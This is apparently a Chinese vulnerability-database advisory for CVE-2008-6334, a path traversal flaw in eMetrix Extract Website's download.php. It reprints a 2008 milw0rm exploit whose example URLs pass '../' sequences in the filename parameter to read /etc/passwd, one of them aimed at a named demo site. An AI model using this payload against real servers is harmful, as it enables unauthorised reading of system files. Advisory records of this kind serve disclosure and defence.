eMetrix Extract Website 'download.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117091 漏洞类型 路径遍历
发布时间 2008-12-19 更新时间 2009-03-02
CVE编号 CVE-2008-6334 CNNVD-ID CNNVD-200902-651
漏洞平台 PHP CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/7525
https://cxsecurity.com/issue/WLB-2009030099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-651
|漏洞详情
eMetrixExtractWebsite的download.php中存在目录遍历漏洞。远程攻击者可以借助filename参数中的一个..,读取任意文件。
|漏洞EXP
Extract Website (download.php filename) Local File Include

# author : Cold z3ro, http://www.hackteach.org/
# script : http://secure.emetrix.com/order/product.asp?PID=74332316
# demo   : http://www.rightscripts.com/extractwebsite/
# about  : This tool help you extract web data include URL links,
       domain names, contact emails, keywords, meta tags, page titles
       or text from other website.
       You can extract these data from a list of website links or from simple text.


# Exploit

[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd



# Example

[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd


==================================
Greetz : www.hackteach.org members , AnGeL25dZ

# milw0rm.com [2008-12-19]
|参考资料

来源:XF
名称:extract-download-file-include(47517)
链接:http://xforce.iss.net/xforce/xfdb/47517
来源:BID
名称:32936
链接:http://www.securityfocus.com/bid/32936
来源:MILW0RM
名称:7525
链接:http://www.milw0rm.com/exploits/7525
来源:SECUNIA
名称:33255
链接:http://secunia.com/advisories/33255